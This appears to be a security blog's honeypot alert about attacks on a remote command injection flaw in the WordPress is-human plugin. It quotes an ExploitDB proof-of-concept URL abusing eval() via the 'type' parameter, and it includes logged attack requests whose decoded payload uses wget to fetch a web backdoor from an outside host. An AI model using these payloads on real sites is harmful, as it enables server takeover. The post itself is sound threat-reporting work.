[Honeypot Alert] More WordPress is_human Plugin Remote Command Injection Attack Detected

As we first noted in a previous Honeypot Alert Blog post, our web honeypots have again received attempts to exploit a WordPress is-human pluging remote command injection vulnerability. ExploitDB lists the following data:

# Exploit Title: is-human (1.4.2 and prior) Worpdress plugin.
# Date: 16.05.2011
# Author: neworder [www.neworder-ind.net]
# Software Link: http://wordpress.org/extend/plugins/is-human/
# Version: 1.4.2
# Tested on: Linux Platform
The vulnerability exists in /is-human/engine.php .
It is possible to take control of the eval() function via the 'type' parameter, when the 'action' is set to log-reset. From here we can run out own code.
In order to avoid any errors we point the $is_hum->get_* array variable into $is_hum->get_ih and to close the execution without error we point it to php stored function error_log(). In between we may place our own php code and use the passthru() function to execute commands.
Execution running the linux whoami command:
http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error

Here are the attacks we picked up:

178.137.167.112 - - [12/Mar/2012:11:14:38 +0000] "GET /wordpress//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 404 568 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
178.137.167.112 - - [12/Mar/2012:11:14:38 +0000] "GET /wordpress//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 404 568 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
178.137.167.112 - - [12/Mar/2012:11:14:42 +0000] "GET //wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 301 765 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

As you can see, the attacker is injecting PHP eval and base64_decode calls into the vulnerable "type" parameter of the is_human WordPress plugin. The base64_decode call results in the following text:

passthru('wget http://troll.hr00.ru/sh.txt; mv sh.txt sh.php');

This attempts to access the OS level wget http client tool to download the "sh.txt" file on the remote site. Here is a snippet of the code:

 
When this code is executed by PHP, it results in a common web backdoor page such as the following screenshot which was taken from Google search results for other compromised hosts.